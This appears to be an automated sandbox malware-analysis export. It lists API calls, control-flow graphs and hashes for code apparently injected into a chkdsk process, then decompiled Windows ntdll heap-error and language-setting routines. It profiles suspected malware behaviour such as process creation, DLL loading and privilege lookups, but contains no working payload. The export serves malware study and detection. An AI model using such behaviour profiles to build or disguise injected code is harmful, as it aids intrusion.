                                                      control_flow_graph 355 4a97303 357 4a972dc-4a972de 355->357 358 4a972d0-4a972da PostThreadMessageW 355->358 359 4a972fd-4a97302 357->359 360 4a972e0-4a972fb call 4a992a0 PostThreadMessageW 357->360 358->357 360->359
                                                      APIs
                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 04A972DA
                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 04A972FB
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 6f3dc74b6e209b631eb56767c025d2bad9b37c20e2d646a975f194e62a1b9f7a
                                                      • Instruction ID: 92d84f9688d475c61804edee7b3a85d3e42ed7011653aeaa4fd96652837e55cb
                                                      • Opcode Fuzzy Hash: 6f3dc74b6e209b631eb56767c025d2bad9b37c20e2d646a975f194e62a1b9f7a
                                                      • Instruction Fuzzy Hash: E6E012657A021975FE2855546C43FBA36D89741F01F50006AFB08EC1C1E9C5280556F1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 559 4a99b40-4a99b5c 560 4a99b64-4a99b69 559->560 561 4a99b5f call 4aaaf70 559->561 562 4a99b6b-4a99b6e 560->562 563 4a99b6f-4a99b7d call 4aab390 560->563 561->560 566 4a99b8d-4a99b9e call 4aa9720 563->566 567 4a99b7f-4a99b8a call 4aab610 563->567 572 4a99ba0-4a99bb4 LdrLoadDll 566->572 573 4a99bb7-4a99bba 566->573 567->566 572->573
                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 04A99BB2
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                      • Instruction ID: 03d5a0da4e9d22a7c6b1394dbe244fdc42761eb871cae5bb0a747d052757fe6c
                                                      • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                      • Instruction Fuzzy Hash: 7B011EB5D4020DBBDF10EBE4DD41F9EB3BC9B54208F004195AA0897284F635FB14CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 04AA89B4
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                      • Instruction ID: c112a8183be8491a7f7732a336aa359547483cbe839d3fbe082553c5d207ea19
                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                      • Instruction Fuzzy Hash: D101AFB2214108ABCB54DF89DC84EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      control_flow_graph 574 4aa895d-4aa8979 575 4aa897f-4aa89b8 CreateProcessInternalW 574->575 576 4aa897a call 4aa91e0 574->576 576->575
                                                      APIs
                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 04AA89B4
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      • Opcode ID: ce62f3000f2bbce27a0ee820e4df8732edcd9c7a874b525a1be2e38594308c11
                                                      • Instruction ID: c698b937fcf534d4bbaa636079a0aed8822a1d92cd0a56fb3df78d78d5469be3
                                                      • Opcode Fuzzy Hash: ce62f3000f2bbce27a0ee820e4df8732edcd9c7a874b525a1be2e38594308c11
                                                      • Instruction Fuzzy Hash: 4701B2B2200108BFCB54DF89DD84EEB37AEAF8C754F158248FA0DA7244C630E951CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,04A9CCF0,?,?), ref: 04AA746C
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: 5d226fe3085f48d15742a8de89908d048e36806695b904c2474a4bc1bd20e8bd
                                                      • Instruction ID: 14577ca8ea0a1bd948795b59759492d2b4fc5fabe525123ae7c49df1fb3d449f
                                                      • Opcode Fuzzy Hash: 5d226fe3085f48d15742a8de89908d048e36806695b904c2474a4bc1bd20e8bd
                                                      • Instruction Fuzzy Hash: 98E092733813043BE73065A99C02FA7B39CDB81B24F55002AFA4DEB2C0D695F81142A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(04AA3536,?,04AA3CAF,04AA3CAF,?,04AA3536,?,?,?,?,?,00000000,00000000,?), ref: 04AA88DD
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                      • Instruction ID: 9057e11b7f967e80cdaa973970aeca2e3f24384975669c7e31d7b3bec91ed1b2
                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                      • Instruction Fuzzy Hash: C0E046B1200208ABDB14EF99CC44EA777ACEF88654F118558FE085B241C630F910CBF0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,04A9CFC2,04A9CFC2,?,00000000,?,?), ref: 04AA8A80
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                      • Instruction ID: a40805b573bdfbe3415e6fcd9bf4d260758d8abc32520f069ef5da2b670a4f48
                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                      • Instruction Fuzzy Hash: 92E01AB12002086BDB10DF49CC84EE737ADAF88650F018554FA0857241CA30F910CBF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,04A97C83,?), ref: 04A9D45B
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: 2ff070207339124700ed174a18ed7179627ea2e9f027f876656bf64ecc5f4b3e
                                                      • Instruction ID: edc8adfdc4ee366876c401254bab87e9e777632380e72f6ae1940337f7a31609
                                                      • Opcode Fuzzy Hash: 2ff070207339124700ed174a18ed7179627ea2e9f027f876656bf64ecc5f4b3e
                                                      • Instruction Fuzzy Hash: F8D02E767903043AEB20EBB09C03FAA67C65F51650F490068FA8DE73C3DA90E2008A20
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetErrorMode.KERNELBASE(00008003,?,?,04A97C83,?), ref: 04A9D45B
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 04A90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4a90000_chkdsk.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorMode
                                                      • String ID:
                                                      • API String ID: 2340568224-0
                                                      • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                      • Instruction ID: 0d532d2a3f8ac14df093732c55d8774e41a6a7a5e7d7259a8db576332d64eb17
                                                      • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                      • Instruction Fuzzy Hash: E3D05E757503042AEA10AAA49C02F2672C95B45A44F494064FA48972C3DA50F4008161
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7acf9721ad2b8da6c5b0fdc6ff5e1ff1c2b04c89e773952d49f6d6df3771c2f5
                                                      • Instruction ID: 3132691443963d7b6150ddcc7d41549c2373426da15d1aa9bbb75cf660ddb2bf
                                                      • Opcode Fuzzy Hash: 7acf9721ad2b8da6c5b0fdc6ff5e1ff1c2b04c89e773952d49f6d6df3771c2f5
                                                      • Instruction Fuzzy Hash: 3DB09BB19414C5C9FB11D7A44608717791177D4745F16C155D1020755A4778D0D1F6B5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      • <unknown>, xrefs: 04E3B27E, 04E3B2D1, 04E3B350, 04E3B399, 04E3B417, 04E3B48E
                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 04E3B39B
                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04E3B323
                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04E3B3D6
                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04E3B47D
                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04E3B2DC
                                                      • read from, xrefs: 04E3B4AD, 04E3B4B2
                                                      • The critical section is owned by thread %p., xrefs: 04E3B3B9
                                                      • *** then kb to get the faulting stack, xrefs: 04E3B51C
                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04E3B305
                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04E3B38F
                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04E3B476
                                                      • an invalid address, %p, xrefs: 04E3B4CF
                                                      • The instruction at %p referenced memory at %p., xrefs: 04E3B432
                                                      • *** enter .cxr %p for the context, xrefs: 04E3B50D
                                                      • Go determine why that thread has not released the critical section., xrefs: 04E3B3C5
                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 04E3B352
                                                      • *** Inpage error in %ws:%s, xrefs: 04E3B418
                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04E3B484
                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04E3B314
                                                      • This failed because of error %Ix., xrefs: 04E3B446
                                                      • The instruction at %p tried to %s , xrefs: 04E3B4B6
                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04E3B53F
                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 04E3B48F
                                                      • a NULL pointer, xrefs: 04E3B4E0
                                                      • write to, xrefs: 04E3B4A6
                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 04E3B2F3
                                                      • The resource is owned exclusively by thread %p, xrefs: 04E3B374
                                                      • *** enter .exr %p for the exception record, xrefs: 04E3B4F1
                                                      • The resource is owned shared by %d threads, xrefs: 04E3B37E
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                      • API String ID: 0-108210295
                                                      • Opcode ID: 76c0679a1e0bf06518b97e065bcd9219cf404d13db6df0ecd91b2005722b4399
                                                      • Instruction ID: b2310bcf478bea9d58e2a7d27b310de60eaf645ce081a258b5212e5506e29e3c
                                                      • Opcode Fuzzy Hash: 76c0679a1e0bf06518b97e065bcd9219cf404d13db6df0ecd91b2005722b4399
                                                      • Instruction Fuzzy Hash: CE81F475A80210FFEB236F058C4AD7B3B37AF86B5AF405045F5066B122F2A1B451DBB6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 44%
                                                      			E04E41C06() {
                                                      				signed int _t27;
                                                      				char* _t104;
                                                      				char* _t105;
                                                      				intOrPtr _t113;
                                                      				intOrPtr _t115;
                                                      				intOrPtr _t117;
                                                      				intOrPtr _t119;
                                                      				intOrPtr _t120;
                                                      
                                                      				_t105 = 0x4d648a4;
                                                      				_t104 = "HEAP: ";
                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                      					_push(_t104);
                                                      					E04D8B150();
                                                      				} else {
                                                      					E04D8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                      				}
                                                      				_push( *0x4e7589c);
                                                      				E04D8B150("Heap error detected at %p (heap handle %p)\n",  *0x4e758a0);
                                                      				_t27 =  *0x4e75898; // 0x0
                                                      				if(_t27 <= 0xf) {
                                                      					switch( *((intOrPtr*)(_t27 * 4 +  &M04E41E96))) {
                                                      						case 0:
                                                      							_t105 = "heap_failure_internal";
                                                      							goto L21;
                                                      						case 1:
                                                      							goto L21;
                                                      						case 2:
                                                      							goto L21;
                                                      						case 3:
                                                      							goto L21;
                                                      						case 4:
                                                      							goto L21;
                                                      						case 5:
                                                      							goto L21;
                                                      						case 6:
                                                      							goto L21;
                                                      						case 7:
                                                      							goto L21;
                                                      						case 8:
                                                      							goto L21;
                                                      						case 9:
                                                      							goto L21;
                                                      						case 0xa:
                                                      							goto L21;
                                                      						case 0xb:
                                                      							goto L21;
                                                      						case 0xc:
                                                      							goto L21;
                                                      						case 0xd:
                                                      							goto L21;
                                                      						case 0xe:
                                                      							goto L21;
                                                      						case 0xf:
                                                      							goto L21;
                                                      					}
                                                      				}
                                                      				L21:
                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                      					_push(_t104);
                                                      					E04D8B150();
                                                      				} else {
                                                      					E04D8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                      				}
                                                      				_push(_t105);
                                                      				E04D8B150("Error code: %d - %s\n",  *0x4e75898);
                                                      				_t113 =  *0x4e758a4; // 0x0
                                                      				if(_t113 != 0) {
                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                      						_push(_t104);
                                                      						E04D8B150();
                                                      					} else {
                                                      						E04D8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                      					}
                                                      					E04D8B150("Parameter1: %p\n",  *0x4e758a4);
                                                      				}
                                                      				_t115 =  *0x4e758a8; // 0x0
                                                      				if(_t115 != 0) {
                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                      						_push(_t104);
                                                      						E04D8B150();
                                                      					} else {
                                                      						E04D8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                      					}
                                                      					E04D8B150("Parameter2: %p\n",  *0x4e758a8);
                                                      				}
                                                      				_t117 =  *0x4e758ac; // 0x0
                                                      				if(_t117 != 0) {
                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                      						_push(_t104);
                                                      						E04D8B150();
                                                      					} else {
                                                      						E04D8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                      					}
                                                      					E04D8B150("Parameter3: %p\n",  *0x4e758ac);
                                                      				}
                                                      				_t119 =  *0x4e758b0; // 0x0
                                                      				if(_t119 != 0) {
                                                      					L41:
                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                      						_push(_t104);
                                                      						E04D8B150();
                                                      					} else {
                                                      						E04D8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                      					}
                                                      					_push( *0x4e758b4);
                                                      					E04D8B150("Last known valid blocks: before - %p, after - %p\n",  *0x4e758b0);
                                                      				} else {
                                                      					_t120 =  *0x4e758b4; // 0x0
                                                      					if(_t120 != 0) {
                                                      						goto L41;
                                                      					}
                                                      				}
                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                      					_push(_t104);
                                                      					E04D8B150();
                                                      				} else {
                                                      					E04D8B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                      				}
                                                      				return E04D8B150("Stack trace available at %p\n", 0x4e758c0);
                                                      			}












                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                      • API String ID: 0-2897834094
                                                      • Opcode ID: cd6c803b9e9c6cf6f7cf17e1953b299d391e187dbccfc804bd77caf5a325f617
                                                      • Instruction ID: cc77ed99bf284a484565bea497cc91ef837efbb9bc4de3cef883a682580b43bf
                                                      • Opcode Fuzzy Hash: cd6c803b9e9c6cf6f7cf17e1953b299d391e187dbccfc804bd77caf5a325f617
                                                      • Instruction Fuzzy Hash: C1619336651144DFEA15AB55E88CE38B3E4EB44A35B0984BEF40E6F711E638FC809F19
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 96%
                                                      			E04D93D34(signed int* __ecx) {
                                                      				signed int* _v8;
                                                      				char _v12;
                                                      				signed int* _v16;
                                                      				signed int* _v20;
                                                      				char _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				char _v36;
                                                      				signed int _v40;
                                                      				signed int _v44;
                                                      				signed int* _v48;
                                                      				signed int* _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				char _v68;
                                                      				signed int _t140;
                                                      				signed int _t161;
                                                      				signed int* _t236;
                                                      				signed int* _t242;
                                                      				signed int* _t243;
                                                      				signed int* _t244;
                                                      				signed int* _t245;
                                                      				signed int _t255;
                                                      				void* _t257;
                                                      				signed int _t260;
                                                      				void* _t262;
                                                      				signed int _t264;
                                                      				void* _t267;
                                                      				signed int _t275;
                                                      				signed int* _t276;
                                                      				short* _t277;
                                                      				signed int* _t278;
                                                      				signed int* _t279;
                                                      				signed int* _t280;
                                                      				short* _t281;
                                                      				signed int* _t282;
                                                      				short* _t283;
                                                      				signed int* _t284;
                                                      				void* _t285;
                                                      
                                                      				_v60 = _v60 | 0xffffffff;
                                                      				_t280 = 0;
                                                      				_t242 = __ecx;
                                                      				_v52 = __ecx;
                                                      				_v8 = 0;
                                                      				_v20 = 0;
                                                      				_v40 = 0;
                                                      				_v28 = 0;
                                                      				_v32 = 0;
                                                      				_v44 = 0;
                                                      				_v56 = 0;
                                                      				_t275 = 0;
                                                      				_v16 = 0;
                                                      				if(__ecx == 0) {
                                                      					_t280 = 0xc000000d;
                                                      					_t140 = 0;
                                                      					L50:
                                                      					 *_t242 =  *_t242 | 0x00000800;
                                                      					_t242[0x13] = _t140;
                                                      					_t242[0x16] = _v40;
                                                      					_t242[0x18] = _v28;
                                                      					_t242[0x14] = _v32;
                                                      					_t242[0x17] = _t275;
                                                      					_t242[0x15] = _v44;
                                                      					_t242[0x11] = _v56;
                                                      					_t242[0x12] = _v60;
                                                      					return _t280;
                                                      				}
                                                      				if(E04D91B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                      					_v56 = 1;
                                                      					if(_v8 != 0) {
                                                      						L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                      					}
                                                      					_v8 = _t280;
                                                      				}
                                                      				if(E04D91B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                      					_v60 =  *_v8;
                                                      					L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                      					_v8 = _t280;
                                                      				}
                                                      				if(E04D91B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                      					L16:
                                                      					if(E04D91B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                      						L28:
                                                      						if(E04D91B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                      							L46:
                                                      							_t275 = _v16;
                                                      							L47:
                                                      							_t161 = 0;
                                                      							L48:
                                                      							if(_v8 != 0) {
                                                      								L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                      							}
                                                      							_t140 = _v20;
                                                      							if(_t140 != 0) {
                                                      								if(_t275 != 0) {
                                                      									L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                      									_t275 = 0;
                                                      									_v28 = 0;
                                                      									_t140 = _v20;
                                                      								}
                                                      							}
                                                      							goto L50;
                                                      						}
                                                      						_t167 = _v12;
                                                      						_t255 = _v12 + 4;
                                                      						_v44 = _t255;
                                                      						if(_t255 == 0) {
                                                      							_t276 = _t280;
                                                      							_v32 = _t280;
                                                      						} else {
                                                      							_t276 = L04DA4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                      							_t167 = _v12;
                                                      							_v32 = _t276;
                                                      						}
                                                      						if(_t276 == 0) {
                                                      							_v44 = _t280;
                                                      							_t280 = 0xc0000017;
                                                      							goto L46;
                                                      						} else {
                                                      							E04DCF3E0(_t276, _v8, _t167);
                                                      							_v48 = _t276;
                                                      							_t277 = E04DD1370(_t276, 0x4d64e90);
                                                      							_pop(_t257);
                                                      							if(_t277 == 0) {
                                                      								L38:
                                                      								_t170 = _v48;
                                                      								if( *_v48 != 0) {
                                                      									E04DCBB40(0,  &_v68, _t170);
                                                      									if(L04D943C0( &_v68,  &_v24) != 0) {
                                                      										_t280 =  &(_t280[0]);
                                                      									}
                                                      								}
                                                      								if(_t280 == 0) {
                                                      									_t280 = 0;
                                                      									L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                      									_v44 = 0;
                                                      									_v32 = 0;
                                                      								} else {
                                                      									_t280 = 0;
                                                      								}
                                                      								_t174 = _v8;
                                                      								if(_v8 != 0) {
                                                      									L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                      								}
                                                      								_v8 = _t280;
                                                      								goto L46;
                                                      							}
                                                      							_t243 = _v48;
                                                      							do {
                                                      								 *_t277 = 0;
                                                      								_t278 = _t277 + 2;
                                                      								E04DCBB40(_t257,  &_v68, _t243);
                                                      								if(L04D943C0( &_v68,  &_v24) != 0) {
                                                      									_t280 =  &(_t280[0]);
                                                      								}
                                                      								_t243 = _t278;
                                                      								_t277 = E04DD1370(_t278, 0x4d64e90);
                                                      								_pop(_t257);
                                                      							} while (_t277 != 0);
                                                      							_v48 = _t243;
                                                      							_t242 = _v52;
                                                      							goto L38;
                                                      						}
                                                      					}
                                                      					_t191 = _v12;
                                                      					_t260 = _v12 + 4;
                                                      					_v28 = _t260;
                                                      					if(_t260 == 0) {
                                                      						_t275 = _t280;
                                                      						_v16 = _t280;
                                                      					} else {
                                                      						_t275 = L04DA4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                      						_t191 = _v12;
                                                      						_v16 = _t275;
                                                      					}
                                                      					if(_t275 == 0) {
                                                      						_v28 = _t280;
                                                      						_t280 = 0xc0000017;
                                                      						goto L47;
                                                      					} else {
                                                      						E04DCF3E0(_t275, _v8, _t191);
                                                      						_t285 = _t285 + 0xc;
                                                      						_v48 = _t275;
                                                      						_t279 = _t280;
                                                      						_t281 = E04DD1370(_v16, 0x4d64e90);
                                                      						_pop(_t262);
                                                      						if(_t281 != 0) {
                                                      							_t244 = _v48;
                                                      							do {
                                                      								 *_t281 = 0;
                                                      								_t282 = _t281 + 2;
                                                      								E04DCBB40(_t262,  &_v68, _t244);
                                                      								if(L04D943C0( &_v68,  &_v24) != 0) {
                                                      									_t279 =  &(_t279[0]);
                                                      								}
                                                      								_t244 = _t282;
